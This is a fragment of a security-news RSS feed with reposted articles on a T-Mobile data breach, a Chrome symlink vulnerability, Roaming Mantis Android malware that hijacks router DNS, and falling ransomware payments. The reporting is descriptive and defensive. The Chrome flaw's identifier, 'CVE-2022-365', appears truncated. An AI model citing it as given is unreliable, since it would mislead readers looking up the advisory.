			In a <a href="https://go.redirectingat.com/?id=66960X1514734&amp;xs=1&amp;url=https%3A%2F%2Fwww.t-mobile.com%2Fnews%2Fbusiness%2Fcustomer-information&amp;referrer=theverge.com&amp;xcust=___vg__p_23327866__t_w__d_D" rel="external nofollow" target="_blank">public press release</a> announcing the breach, T-Mobile omitted that the breach impacted 37 million accounts and that it had gone undetected for over a month. Instead, the statement expressed the company had “shut it down within 24 hours” as soon as its teams had identified the issue. T-Mobile has started to notify customers whose information may have been obtained in the breach.
		</p>

		<p>
			 
		</p>
	</div>

	<div>
		<p>
			“Our investigation is still ongoing, but the malicious activity appears to be fully contained at this time,” the company said in the filing. “There is currently no evidence that the bad actor was able to breach or compromise our systems or our network.”
		</p>

		<p>
			 
		</p>
	</div>

	<div>
		<p>
			T-Mobile has disclosed eight hacks <a href="https://www.theverge.com/2018/8/24/17776836/tmobile-hack-data-breach-personal-information-two-million-customers" rel="external nofollow">since 2018</a>, with previous breaches exposing customer call records in <a href="https://www.theverge.com/2021/1/3/22211839/t-mobile-customers-call-records-hacker-security" rel="external nofollow">January 2021</a>, credit application data in <a href="https://www.theverge.com/2021/8/18/22630446/t-mobile-47-million-data-breach-ssn-pin-pii" rel="external nofollow">August 2021</a>, and an “unknown actor” accessing customer info and executing SIM-swapping attacks in <a href="https://www.theverge.com/2021/12/28/22857619/t-mobile-cyberattack-data-breach-december-2021-cpni-sim-swap" rel="external nofollow">December 2021</a>. In <a href="https://www.theverge.com/2022/4/23/23038570/lapsus-hackers-target-t-mobile-source-code-multiple-breaches-cybersecurity" rel="external nofollow">April last year</a>, the hacking group Lapsus$ stole T-Mobile’s source code after purchasing employees’ credentials online.
		</p>

		<p>
			 
		</p>

		<p>
			 
		</p>
	</div>
</div>

<p>
	<a href="https://www.theverge.com/2023/1/20/23563825/tmobile-data-breach-api-customer-accounts-hacker-security" rel="external nofollow">T-Mobile announces another data breach, impacting 37 million accounts</a>
</p>
]]></description><guid isPermaLink="false">12013</guid><pubDate>Fri, 20 Jan 2023 18:12:37 +0000</pubDate></item><item><title>Vulnerability puts data of 2.5 billion Chrome users at risk</title><link>https://nsaneforums.com/news/security-privacy-news/vulnerability-puts-data-of-25-billion-chrome-users-at-risk-r12047/</link><description><![CDATA[<p>
	Data belonging to about 2.5 billion users has been put at risk by a vulnerability in Google Chrome and Chromium-based browsers. Security firm Imperva Red has issued a warning that the flaw, tracked as ‘CVE-2022-365’, allows attackers to steal information such as cloud-based credentials and sensitive files from e-wallets.
</p>

<p>
	 
</p>

<p>
	In a blog post, Imperva Red explained that attackers could plant a symlink (symbolic link), which the operating system treats as a file pointing to another location in the file system rather than as real content in the directory.
</p>

<div>
	 
</div>

<p>
	Mishandled symlinks can lead to flaws that let threat actors siphon data through the browser, something the browser was never intended to allow.
</p>

<p>
	 
</p>

<p>
	In Chrome, the weakness arose because the browser followed symlinks while processing files and directories without checking where the symbolic link actually pointed.
</p>

<h3>
	How does this affect the users of Chrome, then?
</h3>

<p>
	Researchers describe a scenario in which an attacker sets up a fake crypto wallet website that urges users to create a new wallet by downloading “recovery keys”. The download is a zip archive containing symlinks that point to sensitive files or folders on the victim's computer. When the user unzips the archive and uploads the “keys” back to the website, the browser follows the symlinks and sends the linked files, giving the threat actor access to sensitive data and raising serious privacy concerns.
</p>

<h3>
	Google Chrome response
</h3>

<p>
	In response to Imperva Red's report, Google said the flaw was addressed in the Chrome 108 release and urged users to keep their browser updated so that fixes for discovered vulnerabilities, such as this symlink (soft link) issue, are applied.
</p>

<p>
	 
</p>

<p>
	Source <span>: <a href="https://www.cybersecurity-insiders.com/vulnerability-puts-data-of-2-5-billion-chrome-users-at-risk/" rel="external nofollow">https://www.cybersecurity-insiders.com/vulnerability-puts-data-of-2-5-billion-chrome-users-at-risk/</a></span>
</p>
]]></description><guid isPermaLink="false">12047</guid><pubDate>Fri, 20 Jan 2023 08:00:00 +0000</pubDate></item><item><title>Roaming Mantis&#x2019; Android malware adds DNS changer to hack WiFi routers</title><link>https://nsaneforums.com/news/security-privacy-news/roaming-mantis%E2%80%99-android-malware-adds-dns-changer-to-hack-wifi-routers-r11985/</link><description><![CDATA[<p>
	<span style="font-size:14px;">The Roaming Mantis malware distribution campaign has updated its Android malware to include a DNS changer that modifies DNS settings on vulnerable WiFi routers to spread the infection to other devices.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Starting in September 2022, researchers observed the 'Roaming Mantis' credential theft and malware distribution campaign using a new version of the Wroba.o/XLoader Android malware that detects vulnerable WiFi routers based on their model and changes their DNS.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The malware then creates an HTTP request to hijack a vulnerable WiFi router's DNS settings, causing connected devices to be rerouted to malicious web pages hosting phishing forms or dropping Android malware.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The updated Wroba.o/XLoader Android malware variant was discovered by <a href="https://securelist.com/roaming-mantis-dns-changer-in-malicious-mobile-app/108464/" rel="external nofollow">Kaspersky researchers</a>, who have been tracking Roaming Mantis activity for years. Kaspersky explains that Roaming Mantis has been using DNS hijacking <a href="https://www.bleepingcomputer.com/news/security/roaming-mantis-group-testing-coinhive-miner-redirects-on-iphones/" rel="external nofollow">since at least 2018</a>, but the new element in the latest campaign is that the malware targets specific routers.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The most current campaign using this updated malware targets specific WiFi router models used mainly in South Korea. Still, the hackers can change it anytime to include routers commonly used in other countries.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">This approach allows the threat actors to perform more targeted attacks and compromise only specific users and regions while evading detection in all other cases.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Previous Roaming Mantis campaigns targeted users in Japan, Austria, France, Germany, Turkey, Malaysia, and India.</span>
</p>

<h2>
	<span style="font-size:14px;">A new router DNS changer</span>
</h2>

<p>
	<span style="font-size:14px;">The latest Roaming Mantis campaigns use SMS phishing texts (smishing) to direct targets to a malicious website.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">If the user's mobile device is Android, it will prompt the user to install the malicious Android APK, which is the Wroba.o/XLoader malware. The landing page will instead redirect iOS users to a phishing page that attempts to steal credentials.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="dns-diagram.png" class="ipsImage" data-ratio="51.94" height="313" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/3/dns-diagram.png" />
	<p>
		<span style="font-size:14px;">Latest campaign attack diagram (Kaspersky)</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">Once the XLoader malware is installed in the victim's Android device, it obtains the default gateway IP address from the connected WiFi router. Then it attempts to access the administrator web interface using a default password to discover the device model.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="check-wifi.png" class="ipsImage" data-ratio="75.10" height="282" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/3/check-wifi.png" />
	<p>
		<span style="font-size:14px;">XLoader checking the WiFi router model (Kaspersky)</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">XLoader now features 113 hard-coded strings used to detect specific WiFi router models, and if there's a match, the malware performs the DNS hijacking step by changing the router's settings.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="dns-change.png" class="ipsImage" data-ratio="75.10" height="376" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/3/dns-change.png" />
	<p>
		<span style="font-size:14px;">The malware performs the DNS change on the router (Kaspersky)</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">Kaspersky says the DNS changer uses default credentials (admin/admin) to access the router and then performs changes in the DNS settings using different methods depending on the detected model.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The analysts also explain that the DNS server used by Roaming Mantis only resolves certain domain names to specific landing pages when accessed from a mobile device, which is likely a tactic to hide from security researchers.</span>
</p>

<h2>
	<span style="font-size:14px;">Spreading the infection</span>
</h2>

<p>
	<span style="font-size:14px;">With the router's DNS settings now changed, when other Android devices connect to the WiFi network, they will be redirected to the malicious landing page and prompted to install the malware.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">This creates a continuous stream of infected devices to further breach clean WiFi routers in public networks that serve large numbers of people in the country.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Kaspersky warns that this possibility gives the Roaming Mantis campaign a “purposefully unchained” characteristic, letting the malware spread without tight control.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Although there are no landing pages for U.S.-based targets, and Roaming Mantis doesn’t appear to be actively targeting router models used in the country, Kaspersky’s telemetry shows that 10% of all XLoader victims are in the U.S.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Users can protect themselves from the Roaming Mantis campaigns by avoiding clicking on links received via SMS. However, even more importantly, avoid installing APKs outside Google Play.</span>
</p>

<div>
	 
</div>

<div>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/roaming-mantis-android-malware-adds-dns-changer-to-hack-wifi-routers/" rel="external nofollow">Source</a></span>
</div>
]]></description><guid isPermaLink="false">11985</guid><pubDate>Thu, 19 Jan 2023 18:28:30 +0000</pubDate></item><item><title>Ransomware profits drop 40% in 2022 as victims refuse to pay</title><link>https://nsaneforums.com/news/security-privacy-news/ransomware-profits-drop-40-in-2022-as-victims-refuse-to-pay-r11965/</link><description><![CDATA[<p>
	<span style="font-size:14px;">Ransomware gangs extorted from victims about $456.8 million throughout 2022, a drop of roughly 40% from the record-breaking $765 million recorded in the previous two years.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">According to data from blockchain analytics company Chainalysis, this drastic decline in ransomware profits is not driven by fewer attacks but by victims' refusal to pay the hackers.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="ransomware-profit.png" class="ipsImage" data-ratio="75.10" height="454" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Ransomware/5/ransomware-profit.png" />
	<p>
		<span style="font-size:14px;">Ransomware profits per year (Chainalysis)</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">2022 was one of the most active years in ransomware activity, with thousands of file-encrypting malware strains targeting organizations of all sizes.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">However, likely due to diminishing profits, among other reasons, the average ransomware lifespan dropped from 153 days in 2021 to just 70 days in 2022.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="lifespan.png" class="ipsImage" data-ratio="75.10" height="427" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Ransomware/5/lifespan.png" />
	<p>
		<span style="font-size:14px;">Lifespan of ransomware families (Chainalysis)</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">The year was marked by the end of the Conti operation and the emergence of new ransomware-as-a-service activities like Royal, Play, and BlackBasta. Meanwhile, the operators of LockBit, Hive, Cuba, BlackCat, and Ragnar ransomware maintained a relatively steady flow of victims throughout 2022.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="ransomware-activity.png" class="ipsImage" data-ratio="68.06" height="336" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Ransomware/5/ransomware-activity.png" />
	<p>
		<span style="font-size:14px;">Ransomware gang activity per quarter (Chainalysis)</span>
	</p>
</div>

<h2>
	<span style="font-size:14px;">Victims won’t pay</span>
</h2>

<p>
	<span style="font-size:14px;">Despite the multiple extortion tactics employed by ransomware operators - e.g. file encryption, DDoS attacks, threats to leak stolen data or to inform data protection authorities of a breach - a growing number of victims refuse to meet the threat actors’ demands.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Cyber-intelligence firm Coveware says there's an identifiable trend in its statistics since 2019, showing that the share of victims who pay is steadily dropping.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">In 2019, 76% of ransomware victims chose to pay the ransom while only 24% dealt with the consequences instead. This trend changed in 2022, as 59% of victims chose not to pay the ransom.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="pay-stats.png" class="ipsImage" data-ratio="19.17" height="112" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Ransomware/5/pay-stats.png" />
	<p>
		<span style="font-size:14px;">Ransomware payment percentage (Coveware)</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">The past year marked a significant psychological turning point for both attackers and defenders. 2022 was the first year when more ransomware victims decided not to pay. This shift in behavior highlights a change in the perception and approach toward handling ransomware attacks.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">This change can be attributed mainly to three things:</span>
</p>

<p>
	 
</p>

<ol>
	<li>
		<span style="font-size:14px;">The victims realize that paying the ransom does not guarantee they will get their files back and that the threat actors will delete the stolen files.</span>
	</li>
	<li>
		<span style="font-size:14px;">The public perception of ransomware attacks has matured, and data leaks resulting from these incidents tend to do less damage to brand reputation than they once did.</span>
	</li>
	<li>
		<span style="font-size:14px;">Organizations are following better backup strategies, which ransomware-coverage insurers also require, often giving them a way to restore their IT infrastructure after an attack.</span>
	</li>
</ol>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Even if victims are handling ransomware attacks differently than two years ago, completely discouraging the operators by not paying them is still a distant goal.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">As long as the percentage of paying victims remains significant, or hackers cash in larger amounts from higher-value targets, ransomware attacks will remain a present threat.</span>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/ransomware-profits-drop-40-percent-in-2022-as-victims-refuse-to-pay/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">11965</guid><pubDate>Thu, 19 Jan 2023 17:45:00 +0000</pubDate></item></channel></rss>
